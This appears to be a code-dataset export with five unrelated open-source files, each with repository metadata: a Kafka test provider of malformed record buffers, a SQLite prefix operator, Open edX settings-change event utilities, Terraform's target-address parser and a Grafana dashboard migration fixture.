import org.junit.jupiter.api.extension.ExtensionContext;
import org.junit.jupiter.params.provider.Arguments;
import org.junit.jupiter.params.provider.ArgumentsProvider;
import java.nio.ByteBuffer;
import java.util.Optional;
import java.util.stream.Stream;
/**
 * JUnit {@link ArgumentsProvider} producing deliberately malformed
 * {@code MemoryRecords} buffers paired with the exception (if any) the log
 * layer is expected to raise for each.
 */
public final class InvalidMemoryRecordsProvider implements ArgumentsProvider {
    // Use a baseOffset that's not zero so that it is less likely to match the LEO
    private static final long BASE_OFFSET = 1234;
    private static final int EPOCH = 4321;
    /**
     * Returns a stream of arguments for invalid memory records and the expected exception.
     *
     * The first object in the {@code Arguments} is a {@code MemoryRecords}.
     *
     * The second object in the {@code Arguments} is an {@code Optional<Class<Exception>>} which is
     * the expected exception from the log layer.
     */
    @Override
    public Stream<? extends Arguments> provideArguments(ExtensionContext context) {
        return Stream.of(
            Arguments.of(MemoryRecords.readableRecords(notEnoughBytes()), Optional.empty()),
            Arguments.of(MemoryRecords.readableRecords(recordsSizeTooSmall()), Optional.of(CorruptRecordException.class)),
            Arguments.of(MemoryRecords.readableRecords(notEnoughBytesToMagic()), Optional.empty()),
            Arguments.of(MemoryRecords.readableRecords(negativeMagic()), Optional.of(CorruptRecordException.class)),
            Arguments.of(MemoryRecords.readableRecords(largeMagic()), Optional.of(CorruptRecordException.class)),
            Arguments.of(MemoryRecords.readableRecords(lessBytesThanRecordSize()), Optional.empty())
        );
    }
    /** Buffer one byte shorter than the fixed log overhead (offset + size). */
    private static ByteBuffer notEnoughBytes() {
        var buffer = ByteBuffer.allocate(Records.LOG_OVERHEAD - 1);
        buffer.limit(buffer.capacity());
        return buffer;
    }
    /** Declares a record size smaller than the minimum legacy record overhead. */
    private static ByteBuffer recordsSizeTooSmall() {
        var buffer = ByteBuffer.allocate(256);
        // Write the base offset
        buffer.putLong(BASE_OFFSET);
        // Write record size
        buffer.putInt(LegacyRecord.RECORD_OVERHEAD_V0 - 1);
        buffer.position(0);
        buffer.limit(buffer.capacity());
        return buffer;
    }
    /** Valid header start, but truncated before the magic byte is reachable. */
    private static ByteBuffer notEnoughBytesToMagic() {
        var buffer = ByteBuffer.allocate(256);
        // Write the base offset
        buffer.putLong(BASE_OFFSET);
        // Write record size
        buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
        buffer.position(0);
        buffer.limit(Records.HEADER_SIZE_UP_TO_MAGIC - 1);
        return buffer;
    }
    /** Well-formed header carrying an impossible negative magic value. */
    private static ByteBuffer negativeMagic() {
        var buffer = ByteBuffer.allocate(256);
        // Write the base offset
        buffer.putLong(BASE_OFFSET);
        // Write record size
        buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
        // Write the epoch
        buffer.putInt(EPOCH);
        // Write magic
        buffer.put((byte) -1);
        buffer.position(0);
        buffer.limit(buffer.capacity());
        return buffer;
    }
    /** Well-formed header carrying a magic value beyond the current maximum. */
    private static ByteBuffer largeMagic() {
        var buffer = ByteBuffer.allocate(256);
        // Write the base offset
        buffer.putLong(BASE_OFFSET);
        // Write record size
        buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
        // Write the epoch
        buffer.putInt(EPOCH);
        // Write magic
        buffer.put(RecordBatch.CURRENT_MAGIC_VALUE);
        buffer.position(0);
        buffer.limit(buffer.capacity());
        return buffer;
    }
    /** Valid header, but fewer readable bytes than the declared record size. */
    private static ByteBuffer lessBytesThanRecordSize() {
        var buffer = ByteBuffer.allocate(256);
        // Write the base offset
        buffer.putLong(BASE_OFFSET);
        // Write record size
        buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
        // Write the epoch
        buffer.putInt(EPOCH);
        // Write magic
        buffer.put(RecordBatch.CURRENT_MAGIC_VALUE);
        buffer.position(0);
        buffer.limit(buffer.capacity() - Records.LOG_OVERHEAD - 1);
        return buffer;
    }
}
|
java
|
github
|
https://github.com/apache/kafka
|
clients/src/test/java/org/apache/kafka/common/record/internal/InvalidMemoryRecordsProvider.java
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import, division, unicode_literals
from jx_base.expressions import PrefixOp as PrefixOp_
from jx_sqlite.expressions._utils import check, SQLang
from jx_sqlite.sqlite import sql_call
from mo_dots import wrap
from mo_sql import SQL_TRUE, ConcatSQL, SQL_EQ, SQL_ONE
class PrefixOp(PrefixOp_):
    @check
    def to_sql(self, schema, not_null=False, boolean=False):
        """Translate this prefix test to SQLite SQL: INSTR(expr, prefix) == 1."""
        if not self.expr:
            # No expression to test: a prefix match is vacuously true.
            return wrap([{"name": ".", "sql": {"b": SQL_TRUE}}])
        haystack = SQLang[self.expr].to_sql(schema)[0].sql.s
        needle = SQLang[self.prefix].to_sql(schema)[0].sql.s
        # INSTR returns the 1-based position of the match; position 1 means
        # the needle appears at the start of the haystack, i.e. a prefix.
        sql = ConcatSQL(sql_call("INSTR", haystack, needle), SQL_EQ, SQL_ONE)
        return wrap([{"name": ".", "sql": {"b": sql}}])
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
Utilities for django models.
"""
import unicodedata
import re
from eventtracking import tracker
from django.conf import settings
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from django_countries.fields import Country
# The setting name used for events when "settings" (account settings, preferences, profile information) change.
USER_SETTINGS_CHANGED_EVENT_NAME = u'edx.user.settings.changed'
def get_changed_fields_dict(instance, model_class):
    """
    Helper method for tracking field changes on a model.
    Given a model instance and class, return a dict whose keys are that
    instance's fields which differ from the last saved ones and whose values
    are the old values of those fields. Related fields are not considered.
    Args:
        instance (Model instance): the model instance with changes that are
            being tracked
        model_class (Model class): the class of the model instance we are
            tracking
    Returns:
        dict: a mapping of field names to current database values of those
            fields, or an empty dict if the model is new
    """
    try:
        saved = model_class.objects.get(pk=instance.pk)
    except model_class.DoesNotExist:
        # Brand-new object: nothing has "changed" relative to the database.
        return {}
    names = [f[0].name for f in model_class._meta.get_fields_with_model()]
    # Keep only fields whose saved value differs from the in-memory value,
    # mapped to the *old* (database) value.
    return {
        name: getattr(saved, name)
        for name in names
        if getattr(saved, name) != getattr(instance, name)
    }
def emit_field_changed_events(instance, user, db_table, excluded_fields=None, hidden_fields=None):
    """Emits a settings changed event for each field that has changed.
    Note that this function expects that a `_changed_fields` dict has been set
    as an attribute on `instance` (see `get_changed_fields_dict`).
    Args:
        instance (Model instance): the model instance that is being saved
        user (User): the user that this instance is associated with
        db_table (str): the name of the table that we're modifying
        excluded_fields (list): a list of field names for which events should
            not be emitted
        hidden_fields (list): a list of field names specifying fields whose
            values should not be included in the event (None will be used
            instead)
    Returns:
        None
    """
    excluded = excluded_fields or []
    hidden = hidden_fields or []

    def _serializable(field_name, value):
        """Return a JSON-friendly form of `value`, or None if the field is hidden."""
        if field_name in hidden:
            return None
        if isinstance(value, Country):
            # Country is not JSON serializable; emit the country code instead.
            return value.code if value.code else None
        return value

    changed = getattr(instance, '_changed_fields', {})
    for name in changed:
        if name in excluded:
            continue
        emit_setting_changed_event(
            user, db_table, name,
            _serializable(name, changed[name]),
            _serializable(name, getattr(instance, name)),
        )
    # The snapshot is now stale; drop it so a later save starts fresh.
    if hasattr(instance, '_changed_fields'):
        del instance._changed_fields
def truncate_fields(old_value, new_value):
    """
    Truncates old_value and new_value for analytics event emission if necessary.
    Args:
        old_value(obj): the value before the change
        new_value(obj): the new value being saved
    Returns:
        a dictionary with the following fields:
            'old': the truncated old value
            'new': the truncated new value
            'truncated': the list of fields that have been truncated
    """
    # Budget each value at a quarter of the maximum event size so both copies
    # fit alongside all the other fields recorded in the event.
    limit = settings.TRACK_MAX_EVENT / 4
    old_out, old_cut = _get_truncated_setting_value(old_value, max_length=limit)
    new_out, new_cut = _get_truncated_setting_value(new_value, max_length=limit)
    cut = [label for label, was_cut in (("old", old_cut), ("new", new_cut)) if was_cut]
    return {'old': old_out, 'new': new_out, 'truncated': cut}
def emit_setting_changed_event(user, db_table, setting_name, old_value, new_value):
    """Emits an event for a change in a setting.
    Args:
        user (User): the user that this setting is associated with.
        db_table (str): the name of the table that we're modifying.
        setting_name (str): the name of the setting being changed.
        old_value (object): the value before the change.
        new_value (object): the new value being saved.
    Returns:
        None
    """
    event = truncate_fields(old_value, new_value)
    event.update({
        'setting': setting_name,
        'user_id': user.id,
        'table': db_table,
    })
    tracker.emit(USER_SETTINGS_CHANGED_EVENT_NAME, event)
def _get_truncated_setting_value(value, max_length=None):
    """
    Returns the truncated form of a setting value.
    Returns:
        truncated_value (object): the possibly truncated version of the value.
        was_truncated (bool): returns true if the serialized value was truncated.
    """
    # Only strings are ever truncated; everything else passes through intact.
    needs_cut = (
        isinstance(value, basestring)
        and max_length is not None
        and len(value) > max_length
    )
    if needs_cut:
        return value[:max_length], True
    return value, False
# Taken from Django 1.8 source code because it's not supported in 1.4
def slugify(value):
    """Converts value into a string suitable for readable URLs.
    Converts to ASCII. Converts spaces to hyphens. Removes characters that
    aren't alphanumerics, underscores, or hyphens. Converts to lowercase.
    Also strips leading and trailing whitespace.
    Args:
        value (string): String to slugify.
    """
    # Decompose accented characters and drop anything outside ASCII.
    ascii_text = (
        unicodedata.normalize('NFKD', force_unicode(value))
        .encode('ascii', 'ignore')
        .decode('ascii')
    )
    cleaned = re.sub(r'[^\w\s-]', '', ascii_text).strip().lower()
    # Collapse runs of whitespace/hyphens into single hyphens.
    return mark_safe(re.sub(r'[-\s]+', '-', cleaned))
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package addrs
import (
"fmt"
"github.com/hashicorp/hcl/v2"
"github.com/hashicorp/hcl/v2/hclsyntax"
"github.com/hashicorp/terraform/internal/tfdiags"
)
// Target describes a targeted address with source location information.
type Target struct {
	// Subject is the address being targeted.
	Subject Targetable
	// SourceRange is the location in configuration/input where the
	// address was written, for use in diagnostics.
	SourceRange tfdiags.SourceRange
}
// ParseTarget attempts to interpret the given traversal as a targetable
// address. The given traversal must be absolute, or this function will
// panic.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the Target value is invalid and
// must not be used.
func ParseTarget(traversal hcl.Traversal) (*Target, tfdiags.Diagnostics) {
	// Wildcard ([*]) instance syntax is not allowed here; see
	// ParsePartialTarget for that variant.
	return parseTarget(traversal, false)
}
// ParsePartialTarget is like ParseTarget, but it allows the given traversal
// to support the [*] wildcard syntax for resource instances. These indicate
// a "partial" resource address that refers to all potential instances of a
// resource or module.
func ParsePartialTarget(traversal hcl.Traversal) (*Target, tfdiags.Diagnostics) {
	// allowPartial permits the [*] wildcard instance key.
	return parseTarget(traversal, true)
}
// parseTarget is the shared implementation behind ParseTarget and
// ParsePartialTarget. It consumes any module-instance prefix first and then,
// if anything remains, interprets the rest as a resource (instance) address.
func parseTarget(traversal hcl.Traversal, allowPartial bool) (*Target, tfdiags.Diagnostics) {
	modPath, rest, diags := parseModuleInstancePrefix(traversal, allowPartial)
	if diags.HasErrors() {
		return nil, diags
	}
	srcRange := tfdiags.SourceRangeFromHCL(traversal.SourceRange())
	if len(rest) == 0 {
		// Just a module path: the target is the module instance itself.
		return &Target{
			Subject:     modPath,
			SourceRange: srcRange,
		}, diags
	}
	instAddr, moreDiags := parseResourceInstanceUnderModule(modPath, allowPartial, rest)
	diags = diags.Append(moreDiags)
	if diags.HasErrors() {
		return nil, diags
	}
	var subject Targetable = instAddr
	if instAddr.Resource.Key == NoKey {
		// We always assume that a no-key instance is meant to be referring
		// to the whole resource, because the distinction doesn't really
		// matter for targets anyway.
		subject = instAddr.ContainingResource()
	}
	return &Target{
		Subject:     subject,
		SourceRange: srcRange,
	}, diags
}
// parseConfigResourceUnderModule attempts to parse the given traversal as the
// address for a ConfigResource in the context of the given module.
//
// Error diagnostics are returned if the resource address contains an instance
// key.
func parseConfigResourceUnderModule(moduleAddr Module, remain hcl.Traversal) (ConfigResource, tfdiags.Diagnostics) {
	var diags tfdiags.Diagnostics
	mode := ManagedResourceMode
	if remain.RootName() == "data" {
		// A leading "data." selects data resource mode; consume that step.
		mode = DataResourceMode
		remain = remain[1:]
	}
	// At minimum we need a resource type step and a resource name step.
	if len(remain) < 2 {
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "Resource specification must include a resource type and name.",
			Subject:  remain.SourceRange().Ptr(),
		})
		return ConfigResource{}, diags
	}
	var typeName, name string
	// The type step is a TraverseRoot when there was no "data." prefix,
	// and a TraverseAttr otherwise.
	switch tt := remain[0].(type) {
	case hcl.TraverseRoot:
		typeName = tt.Name
	case hcl.TraverseAttr:
		typeName = tt.Name
	default:
		// Tailor the error message to the resource mode.
		switch mode {
		case ManagedResourceMode:
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "A resource type name is required.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
		case DataResourceMode:
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "A data source name is required.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
		default:
			panic("unknown mode")
		}
		return ConfigResource{}, diags
	}
	switch tt := remain[1].(type) {
	case hcl.TraverseAttr:
		name = tt.Name
	default:
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "A resource name is required.",
			Subject:  remain[1].SourceRange().Ptr(),
		})
		return ConfigResource{}, diags
	}
	remain = remain[2:]
	// Anything left over would be an instance key, which a whole-resource
	// (config) address must not carry.
	if len(remain) > 0 {
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Resource instance keys not allowed",
			Detail:   "Resource address must be a resource (e.g. \"test_instance.foo\"), not a resource instance (e.g. \"test_instance.foo[1]\").",
			Subject:  remain[0].SourceRange().Ptr(),
		})
		return ConfigResource{}, diags
	}
	return ConfigResource{
		Module: moduleAddr,
		Resource: Resource{
			Mode: mode,
			Type: typeName,
			Name: name,
		},
	}, diags
}
// parseResourceInstanceUnderModule interprets the remaining traversal steps
// (after any module prefix has been consumed) as a resource instance address
// within the given module instance. When allowPartial is set, the [*]
// wildcard is accepted as the instance key.
func parseResourceInstanceUnderModule(moduleAddr ModuleInstance, allowPartial bool, remain hcl.Traversal) (AbsResourceInstance, tfdiags.Diagnostics) {
	// Note that this helper is used as part of both ParseTarget and
	// ParseMoveEndpoint, so its error messages should be generic
	// enough to suit both situations.
	var diags tfdiags.Diagnostics
	mode := ManagedResourceMode
	// An optional leading keyword selects the resource mode; consume it.
	switch remain.RootName() {
	case "data":
		mode = DataResourceMode
		remain = remain[1:]
	case "ephemeral":
		mode = EphemeralResourceMode
		remain = remain[1:]
	case "list":
		mode = ListResourceMode
		remain = remain[1:]
	case "resource":
		// Starting a resource address with "resource" is optional, so we'll
		// just ignore it.
		remain = remain[1:]
	case "count", "each", "local", "module", "path", "self", "terraform", "var", "template", "lazy", "arg":
		// These are all reserved words that are not valid as resource types.
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   fmt.Sprintf("The keyword %q is reserved and cannot be used to target a resource address. If you are targeting a resource type that uses a reserved keyword, please prefix your address with \"resource.\".", remain.RootName()),
			Subject:  remain.SourceRange().Ptr(),
		})
		return AbsResourceInstance{}, diags
	}
	// At minimum we need a resource type step and a resource name step.
	if len(remain) < 2 {
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "Resource specification must include a resource type and name.",
			Subject:  remain.SourceRange().Ptr(),
		})
		return AbsResourceInstance{}, diags
	}
	var typeName, name string
	// The type step is a TraverseRoot when no mode keyword was consumed,
	// and a TraverseAttr otherwise.
	switch tt := remain[0].(type) {
	case hcl.TraverseRoot:
		typeName = tt.Name
	case hcl.TraverseAttr:
		typeName = tt.Name
	default:
		// Tailor the error message to the resource mode.
		switch mode {
		case ManagedResourceMode:
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "A resource type name is required.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
		case DataResourceMode:
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "A data source name is required.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
		case EphemeralResourceMode:
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "An ephemeral resource type name is required.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
		case ListResourceMode:
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "A list resource type name is required.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
		default:
			panic("unknown mode")
		}
		return AbsResourceInstance{}, diags
	}
	switch tt := remain[1].(type) {
	case hcl.TraverseAttr:
		name = tt.Name
	default:
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "A resource name is required.",
			Subject:  remain[1].SourceRange().Ptr(),
		})
		return AbsResourceInstance{}, diags
	}
	remain = remain[2:]
	// Whatever is left is the (optional) instance key.
	switch len(remain) {
	case 0:
		// No key: the single no-key instance of the resource.
		return moduleAddr.ResourceInstance(mode, typeName, name, NoKey), diags
	case 1:
		switch tt := remain[0].(type) {
		case hcl.TraverseIndex:
			key, err := ParseInstanceKey(tt.Key)
			if err != nil {
				diags = diags.Append(&hcl.Diagnostic{
					Severity: hcl.DiagError,
					Summary:  "Invalid address",
					Detail:   fmt.Sprintf("Invalid resource instance key: %s.", err),
					Subject:  remain[0].SourceRange().Ptr(),
				})
				return AbsResourceInstance{}, diags
			}
			return moduleAddr.ResourceInstance(mode, typeName, name, key), diags
		case hcl.TraverseSplat:
			if allowPartial {
				// [*] stands for all potential instances of the resource.
				return moduleAddr.ResourceInstance(mode, typeName, name, WildcardKey), diags
			}
			// Otherwise, return an error.
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "Resource instance key must be given in square brackets.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
			return AbsResourceInstance{}, diags
		default:
			diags = diags.Append(&hcl.Diagnostic{
				Severity: hcl.DiagError,
				Summary:  "Invalid address",
				Detail:   "Resource instance key must be given in square brackets.",
				Subject:  remain[0].SourceRange().Ptr(),
			})
			return AbsResourceInstance{}, diags
		}
	default:
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "Unexpected extra operators after address.",
			Subject:  remain[1].SourceRange().Ptr(),
		})
		return AbsResourceInstance{}, diags
	}
}
// ParseTargetStr is a helper wrapper around ParseTarget that takes a string
// and parses it with the HCL native syntax traversal parser before
// interpreting it.
//
// This should be used only in specialized situations since it will cause the
// created references to not have any meaningful source location information.
// If a target string is coming from a source that should be identified in
// error messages then the caller should instead parse it directly using a
// suitable function from the HCL API and pass the traversal itself to
// ParseTarget.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned target may be nil or incomplete.
func ParseTargetStr(str string) (*Target, tfdiags.Diagnostics) {
	var diags tfdiags.Diagnostics
	trav, travDiags := hclsyntax.ParseTraversalAbs([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
	diags = diags.Append(travDiags)
	if travDiags.HasErrors() {
		// Nothing to interpret if the traversal itself didn't parse.
		return nil, diags
	}
	tgt, tgtDiags := ParseTarget(trav)
	diags = diags.Append(tgtDiags)
	return tgt, diags
}
// ParseAbsResource attempts to interpret the given traversal as an absolute
// resource address, using the same syntax as expected by ParseTarget.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the AbsResource value is invalid and
// must not be used.
func ParseAbsResource(traversal hcl.Traversal) (AbsResource, tfdiags.Diagnostics) {
	target, diags := ParseTarget(traversal)
	if diags.HasErrors() {
		return AbsResource{}, diags
	}
	switch subject := target.Subject.(type) {
	case AbsResource:
		return subject, diags
	case AbsResourceInstance:
		// Likely user error: they gave a resource *instance* address. The
		// last traversal step must be the index, since that's required for
		// a valid resource instance address, so point the error at it.
		lastStep := traversal[len(traversal)-1]
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "A resource address is required. This instance key identifies a specific resource instance, which is not expected here.",
			Subject:  lastStep.SourceRange().Ptr(),
		})
		return AbsResource{}, diags
	case ModuleInstance:
		// Likely user error: a bare module path with no resource spec.
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "A resource address is required here. The module path must be followed by a resource specification.",
			Subject:  traversal.SourceRange().Ptr(),
		})
		return AbsResource{}, diags
	default:
		// Generic message for any other targetable address type.
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "A resource address is required here.",
			Subject:  traversal.SourceRange().Ptr(),
		})
		return AbsResource{}, diags
	}
}
// ParseAbsResourceStr is a helper wrapper around ParseAbsResource that takes a
// string and parses it with the HCL native syntax traversal parser before
// interpreting it.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned address may be incomplete.
//
// Since this function has no context about the source of the given string,
// any returned diagnostics will not have meaningful source location
// information.
func ParseAbsResourceStr(str string) (AbsResource, tfdiags.Diagnostics) {
	var diags tfdiags.Diagnostics
	trav, travDiags := hclsyntax.ParseTraversalAbs([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
	diags = diags.Append(travDiags)
	if travDiags.HasErrors() {
		// Nothing to interpret if the traversal itself didn't parse.
		return AbsResource{}, diags
	}
	res, resDiags := ParseAbsResource(trav)
	diags = diags.Append(resDiags)
	return res, diags
}
// ParseAbsResourceInstance attempts to interpret the given traversal as an
// absolute resource instance address, using the same syntax as expected by
// ParseTarget.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the AbsResource value is invalid and
// must not be used.
func ParseAbsResourceInstance(traversal hcl.Traversal) (AbsResourceInstance, tfdiags.Diagnostics) {
	tgt, diags := ParseTarget(traversal)
	if diags.HasErrors() {
		return AbsResourceInstance{}, diags
	}
	// Narrow the generic target down to a resource instance address.
	inst, narrowDiags := validateResourceFromTarget(tgt, traversal.SourceRange().Ptr())
	diags = diags.Append(narrowDiags)
	return inst, diags
}
// ParsePartialResourceInstance attempts to interpret the given traversal as a
// partial absolute resource instance address, using the same syntax as expected
// by ParsePartialTarget.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the AbsResource value is invalid and
// must not be used.
func ParsePartialResourceInstance(traversal hcl.Traversal) (AbsResourceInstance, tfdiags.Diagnostics) {
	tgt, diags := ParsePartialTarget(traversal)
	if diags.HasErrors() {
		return AbsResourceInstance{}, diags
	}
	// Narrow the generic target down to a resource instance address.
	inst, narrowDiags := validateResourceFromTarget(tgt, traversal.SourceRange().Ptr())
	diags = diags.Append(narrowDiags)
	return inst, diags
}
// validateResourceFromTarget narrows a parsed target down to an
// AbsResourceInstance, reporting an error diagnostic (at the given source
// range) when the target is any other kind of address.
func validateResourceFromTarget(addr *Target, src *hcl.Range) (AbsResourceInstance, tfdiags.Diagnostics) {
	var diags tfdiags.Diagnostics
	switch subject := addr.Subject.(type) {
	case AbsResource:
		// A whole-resource address stands for its single no-key instance.
		return subject.Instance(NoKey), diags
	case AbsResourceInstance:
		return subject, diags
	case ModuleInstance:
		// Likely user error: a module path with no resource instance spec.
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "A resource instance address is required here. The module path must be followed by a resource instance specification.",
			Subject:  src,
		})
		return AbsResourceInstance{}, diags
	default:
		// Generic message for any other targetable address type.
		diags = diags.Append(&hcl.Diagnostic{
			Severity: hcl.DiagError,
			Summary:  "Invalid address",
			Detail:   "A resource address is required here.",
			Subject:  src,
		})
		return AbsResourceInstance{}, diags
	}
}
// ParseAbsResourceInstanceStr is a helper wrapper around
// ParseAbsResourceInstance that takes a string and parses it with the HCL
// native syntax traversal parser before interpreting it.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned address may be incomplete.
//
// Since this function has no context about the source of the given string,
// any returned diagnostics will not have meaningful source location
// information.
func ParseAbsResourceInstanceStr(str string) (AbsResourceInstance, tfdiags.Diagnostics) {
	var diags tfdiags.Diagnostics
	trav, travDiags := hclsyntax.ParseTraversalAbs([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
	diags = diags.Append(travDiags)
	if travDiags.HasErrors() {
		// Nothing to interpret if the traversal itself didn't parse.
		return AbsResourceInstance{}, diags
	}
	inst, instDiags := ParseAbsResourceInstance(trav)
	diags = diags.Append(instDiags)
	return inst, diags
}
// ParsePartialResourceInstanceStr is a helper wrapper around
// ParsePartialResourceInstance that takes a string and parses it with the HCL
// native syntax traversal parser before interpreting it.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned address may be incomplete.
//
// Since this function has no context about the source of the given string,
// any returned diagnostics will not have meaningful source location
// information.
func ParsePartialResourceInstanceStr(str string) (AbsResourceInstance, tfdiags.Diagnostics) {
	var diags tfdiags.Diagnostics
	// Note: the *partial* traversal parser, which accepts [*] steps.
	trav, travDiags := hclsyntax.ParseTraversalPartial([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
	diags = diags.Append(travDiags)
	if travDiags.HasErrors() {
		return AbsResourceInstance{}, diags
	}
	inst, instDiags := ParsePartialResourceInstance(trav)
	diags = diags.Append(instDiags)
	return inst, diags
}
// ModuleAddr returns the module address portion of the subject of
// the receiving target.
//
// Regardless of specific address type, all targets always include
// a module address. They might also include something in that
// module, which this method always discards if so.
func (t *Target) ModuleAddr() ModuleInstance {
	switch subject := t.Subject.(type) {
	case ModuleInstance:
		return subject
	case Module:
		// A plain module address is assumed to describe a path of
		// single-instance (unkeyed) modules.
		return subject.UnkeyedInstanceShim()
	case AbsResource:
		return subject.Module
	case AbsResourceInstance:
		return subject.Module
	case AbsAction:
		return subject.Module
	case AbsActionInstance:
		return subject.Module
	default:
		// The cases above should be exhaustive for all
		// implementations of Targetable.
		panic(fmt.Sprintf("unsupported target address type %T", subject))
	}
}
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/addrs/parse_target.go
|
{
"kind": "Dashboard",
"apiVersion": "dashboard.grafana.app/v2alpha1",
"metadata": {
"name": "v40.refresh_string.v42"
},
"spec": {
"annotations": [
{
"kind": "AnnotationQuery",
"spec": {
"datasource": {
"type": "grafana",
"uid": "-- Grafana --"
},
"query": {
"kind": "grafana",
"spec": {}
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"builtIn": true,
"legacyOptions": {
"type": "dashboard"
}
}
}
],
"cursorSync": "Off",
"editable": true,
"elements": {},
"layout": {
"kind": "GridLayout",
"spec": {
"items": []
}
},
"links": [],
"liveNow": false,
"preload": false,
"tags": [],
"timeSettings": {
"timezone": "",
"from": "now-6h",
"to": "now",
"autoRefresh": "1m",
"autoRefreshIntervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"hideTimepicker": false,
"fiscalYearStartMonth": 0
},
"title": "String Refresh Test Dashboard",
"variables": []
},
"status": {
"conversion": {
"failed": false,
"storedVersion": "v1beta1"
}
}
}
|
json
|
github
|
https://github.com/grafana/grafana
|
apps/dashboard/pkg/migration/conversion/testdata/migrated_dashboards_output/v1beta1-mig-v40.refresh_string.v42.v2alpha1.json
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.